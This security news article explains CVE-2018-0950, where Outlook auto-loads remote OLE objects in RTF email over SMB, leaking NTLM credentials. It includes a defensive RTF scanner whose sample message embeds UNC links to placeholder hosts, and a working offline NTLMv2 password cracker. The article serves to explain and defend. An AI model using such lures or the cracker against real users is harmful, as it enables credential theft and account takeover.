
Hackers Can Steal Password Hashes & Crash Windows systems Automatically with Microsoft Outlook and OLE


A researcher found that Microsoft Outlook, combined with OLE, can be made to leak a user's password hash and, paired with a separate SMB client bug, crash the Windows system: an RTF email carrying an OLE object that points at a remote SMB server is enough, with no click required.

OLE (Object Linking and Embedding) is a compound document technology created by Microsoft that lets one document embed, or link to, content managed by another application.

Microsoft Outlook is the email client that ships with Microsoft Office, and it can send and render rich text (RTF) email messages.

Rich text messages are rendered in full when they are opened in the Outlook client.

HTML email is the more common rich format, and here Outlook is careful: when an HTML message references a remote image on a web server, the image is not loaded automatically. Fetching it would reveal the recipient's IP address and metadata such as the time the message was viewed (the classic tracking pixel, or web bug), so Outlook blocks remote web content by default.

But the same remote image, referenced from an OLE object in an RTF message and served from an SMB server instead of a web server, was loaded and rendered without any prompt.

According to the researcher, this is unexpected: Outlook blocks remote web content because of the privacy risk of web bugs, but with a rich text email the OLE object is loaded with no user interaction.
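A mail gateway or an incident responder can look for this pattern before Outlook ever renders the message. The Python scanner below is an added example, not code from the article or from the researcher: it pulls the hex payload out of each RTF \objdata group, decodes it and reports any UNC path (\\host\share) stored in it as ASCII or UTF-16LE, and it also catches UNC paths written directly in RTF syntax, for example inside an INCLUDEPICTURE field instruction. The sample message, its host names and the layout of the object blob are constructed for the demonstration and are not taken from the real exploit.

```python
import re

# UNC path: \\host\share[\more]  (str pattern, re-used as bytes for ASCII blobs)
UNC_TEXT_RE = re.compile(r"\\\\([A-Za-z0-9.\-]+)\\([A-Za-z0-9._$\-]+(?:\\[A-Za-z0-9._$\-]+)*)")
UNC_BYTES_RE = re.compile(UNC_TEXT_RE.pattern.encode())
# RTF escapes every backslash as "\\", so \\host\share appears as \\\\host\\share
# in RTF source (e.g. inside a \fldinst INCLUDEPICTURE instruction).
UNC_RTF_RE = re.compile(
    r"\\\\\\\\([A-Za-z0-9.\-]+)\\\\([A-Za-z0-9._$\-]+(?:\\\\[A-Za-z0-9._$\-]+)*)")
# Payload of an RTF \objdata group: hex digits, usually wrapped across lines.
OBJDATA_RE = re.compile(r"\\objdata\s*([0-9A-Fa-f\s]+)")


def _unc(host: str, rest: str) -> str:
    return "\\\\" + host + "\\" + rest


def unc_targets_in_bytes(blob: bytes) -> set:
    """UNC paths inside a decoded OLE blob, whether stored as ASCII or UTF-16LE."""
    found = set()
    for m in UNC_BYTES_RE.finditer(blob):
        found.add(_unc(m.group(1).decode(), m.group(2).decode()))
    # UTF-16LE strings may start on either byte boundary; try both alignments.
    for offset in (0, 1):
        text = blob[offset:].decode("utf-16le", errors="ignore")
        for m in UNC_TEXT_RE.finditer(text):
            found.add(_unc(m.group(1), m.group(2)))
    return found


def scan_rtf(rtf: str) -> list:
    """Return every UNC target an RTF body could make Outlook resolve over SMB."""
    found = set()
    for m in OBJDATA_RE.finditer(rtf):
        hexdata = re.sub(r"\s+", "", m.group(1))
        if len(hexdata) % 2:          # truncated hex run: drop the dangling nibble
            hexdata = hexdata[:-1]
        found |= unc_targets_in_bytes(bytes.fromhex(hexdata))
    for m in UNC_RTF_RE.finditer(rtf):
        found.add(_unc(m.group(1), m.group(2).replace("\\\\", "\\")))
    return sorted(found)


def _objdata_hex(target: str) -> str:
    # Constructed blob: a few header-like bytes followed by the link target as a
    # NUL-terminated string, the shape a linked object's moniker takes. It is not
    # a real OLE stream, just enough structure to exercise the scanner.
    return (b"\x01\x05\x00\x00\x02\x00\x00\x00" + target.encode() + b"\x00").hex()


# Constructed sample message (hosts are placeholders): an auto-linked OLE object
# whose target lives on an SMB share, plus an INCLUDEPICTURE field pointing at a
# second share written directly in RTF syntax.
SAMPLE_RTF = (
    r"{\rtf1\ansi\deff0{\fonttbl{\f0 Calibri;}}" "\n"
    r"\pard Quarterly report attached.\par" "\n"
    r"{\object\objautlink\objw1440\objh1440{\*\objclass Package}{\*\objdata " "\n"
    + _objdata_hex(r"\\10.0.0.99\share\report.png") + "\n}}\n"
    r"{\field{\*\fldinst INCLUDEPICTURE \\\\files.example.test\\pub\\logo.png \\d}{\fldrslt }}" "\n"
    r"\par }"
)

if __name__ == "__main__":
    for target in scan_rtf(SAMPLE_RTF):
        print("remote UNC reference:", target)
```

Any hit is worth quarantining or at least rewriting, since a legitimate internal share name looks the same as an attacker's host to Outlook; the scanner deliberately reports both and leaves the allow-listing of known hosts to the caller.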

Traffic Capture and Stealing Password Hash

The researcher captured the network traffic generated while Outlook loaded the remotely hosted object, to see what information the automatic load leaks.

“Here we can see that an SMB connection is being automatically negotiated. The only action that triggers this negotiation is Outlook previewing an email that is sent to it.”

In this case the researcher found that the following data are leaked by the OLE web bug:

  1. IP address
  2. Domain name
  3. User name
  4. Host name
  5. SMB session key

This Outlook bug also initiates an SMB (Server Message Block) connection to an arbitrary host, which makes it a delivery vector for an SMB client flaw disclosed on February 1, 2017: upon connecting to a malicious SMB server, Windows crashes.

For this case the attacker creates a rich text email in Outlook whose OLE object points to an SMB server that exploits that vulnerability; merely previewing the email crashes the recipient's Windows system.

The captured NTLM challenge/response was then cracked with John the Ripper, which recovered the password of the user "test_user".
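To see why a captured SMB authentication is worth cracking, here is the NTLMv2 computation the Windows client performs, as an added example that is neither the researcher's code nor John the Ripper's implementation. What the rogue SMB server records is a keyed MAC over its own challenge, so each candidate password can be tested offline with one MD4 and two HMAC-MD5 operations. The user name, domain, server challenge, blob, password and wordlist below are all constructed; MD4 is implemented in pure Python because hashlib's md4 is disabled in many OpenSSL 3 builds.

```python
import hashlib
import hmac
import struct

R2_K = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)   # round 2 word order
R3_K = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)   # round 3 word order


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320) in pure Python."""
    mask = 0xFFFFFFFF
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda v, s: ((v << s) | (v >> (32 - s))) & mask
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for i in range(48):
            if i < 16:
                f, k, s, add = F(b, c, d), i, (3, 7, 11, 19)[i % 4], 0
            elif i < 32:
                f, k, s, add = G(b, c, d), R2_K[i - 16], (3, 5, 9, 13)[i % 4], 0x5A827999
            else:
                f, k, s, add = H(b, c, d), R3_K[i - 32], (3, 9, 11, 15)[i % 4], 0x6ED9EBA1
            a, b, c, d = d, rotl((a + f + X[k] + add) & mask, s), b, c
        A, B, C, D = (A + a) & mask, (B + b) & mask, (C + c) & mask, (D + d) & mask
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4 of the UTF-16LE password; unsalted, hence fast offline guessing."""
    return md4(password.encode("utf-16le"))


def ntlmv2_key(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(NT hash, uppercase(user) + domain), per MS-NLMP."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def nt_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge + blob): the value the server sees."""
    return hmac.new(ntlmv2_key(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def capture_line(user: str, domain: str, server_challenge: bytes, proof: bytes, blob: bytes) -> str:
    """The user::domain:challenge:proof:blob line John and hashcat (mode 5600) accept."""
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack_ntlmv2(line: str, wordlist):
    """Offline guessing: recompute NTProofStr for each candidate and compare."""
    user, _, domain, chal_hex, proof_hex, blob_hex = line.split(":")
    chal, proof, blob = bytes.fromhex(chal_hex), bytes.fromhex(proof_hex), bytes.fromhex(blob_hex)
    for candidate in wordlist:
        if hmac.compare_digest(nt_proof(candidate, user, domain, chal, blob), proof):
            return candidate
    return None


# Constructed "capture": what a rogue SMB server would record when Outlook
# auto-loads the OLE object. Challenge, blob contents and password are made up.
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
# NTLMv2_CLIENT_CHALLENGE blob: resp type 1, hi resp type 1, 6 reserved, timestamp,
# client challenge, 4 reserved, then an empty AV_PAIR list (MsvAvEOL).
BLOB = b"\x01\x01" + bytes(6) + bytes(8) + bytes.fromhex("a1b2c3d4e5f60718") + bytes(4) + bytes(4)
CAPTURED = capture_line("test_user", "WORKGROUP", SERVER_CHALLENGE,
                        nt_proof("Winter2018!", "test_user", "WORKGROUP", SERVER_CHALLENGE, BLOB), BLOB)
WORDLIST = ["password", "letmein", "Summer2017", "Winter2018!"]

if __name__ == "__main__":
    print(CAPTURED)
    print("recovered:", crack_ntlmv2(CAPTURED, WORDLIST))
```

The proof is bound to the server's challenge, so it cannot simply be replayed later; it can be cracked offline, as here, or relayed in real time to another service while the connection is open. Both outcomes follow from the client authenticating to a host it never chose, which is why the defensive fix is to block outbound SMB (TCP 445) at the network edge rather than to rely on password strength alone.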

The issue was reported to Microsoft, which released a fix for Outlook automatically loading remote OLE content as CVE-2018-0950. The patch stops the automatic load only: a user who clicks a link to a UNC path in a message still makes Windows authenticate to that SMB server, so blocking outbound SMB at the network edge remains the practical defence.

Balaji

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.
